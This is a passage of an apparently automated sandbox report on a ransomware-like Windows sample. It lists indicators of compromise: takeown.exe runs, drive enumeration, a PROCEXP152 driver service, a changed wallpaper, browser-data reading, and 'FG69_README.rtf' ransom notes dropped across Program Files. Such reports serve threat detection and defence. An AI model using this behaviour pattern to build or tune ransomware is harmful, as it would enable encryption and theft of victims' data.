takeown.exe 292 takeown.exe 1800 takeown.exe 1324 takeown.exe 1096 takeown.exe 224 takeown.exe 1468 takeown.exe 228 takeown.exe 940 takeown.exe 216 takeown.exe 1888 takeown.exe 524 takeown.exe 236 takeown.exe 220 takeown.exe 1376 takeown.exe 864 takeown.exe 228 takeown.exe 1860 takeown.exe 228 takeown.exe 1424 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Libraries\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Videos\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UBDEWKGM\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Music\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Links\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G9Q5MRQ4\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0V5SICB9\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Pictures\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Searches\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Music\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Desktop\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Videos\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Documents\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Downloads\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Documents\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\4AO3J8KQ\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\P: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\M: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\F: IhR8G8EE64.exe File opened (read-only) \??\Y: IhR8G8EE64.exe File opened (read-only) \??\Z: IhR8G8EE64.exe File opened (read-only) \??\U: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\S: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\R: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\O: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\E: IhR8G8EE64.exe File opened (read-only) \??\J: IhR8G8EE64.exe File opened (read-only) \??\X: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\K: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\J: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\E: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\G: IhR8G8EE64.exe File opened (read-only) \??\L: IhR8G8EE64.exe File opened (read-only) \??\T: IhR8G8EE64.exe File opened (read-only) \??\U: IhR8G8EE64.exe File opened (read-only) \??\Y: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\Q: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\L: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\H: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\N: IhR8G8EE64.exe File opened (read-only) \??\Q: IhR8G8EE64.exe File opened (read-only) \??\W: IhR8G8EE64.exe File opened (read-only) \??\V: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\T: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\N: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\K: IhR8G8EE64.exe File opened (read-only) \??\P: IhR8G8EE64.exe File opened (read-only) \??\R: IhR8G8EE64.exe File opened (read-only) \??\I: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\M: IhR8G8EE64.exe File opened (read-only) \??\O: IhR8G8EE64.exe File opened (read-only) \??\V: IhR8G8EE64.exe File opened (read-only) \??\I: IhR8G8EE64.exe File opened (read-only) \??\S: IhR8G8EE64.exe File opened (read-only) \??\Z: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\G: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\F: d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened (read-only) \??\A: IhR8G8EE64.exe File opened (read-only) \??\B: IhR8G8EE64.exe File opened (read-only) \??\H: IhR8G8EE64.exe File opened (read-only) \??\X: IhR8G8EE64.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 IhR8G8EE64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" IhR8G8EE64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" IhR8G8EE64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" IhR8G8EE64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 IhR8G8EE64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" IhR8G8EE64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\lU4Va4nk.bmp" reg.exe -
Drops file in Program Files directory 3069 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\deploy\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\browser\features\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SyncProtect.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 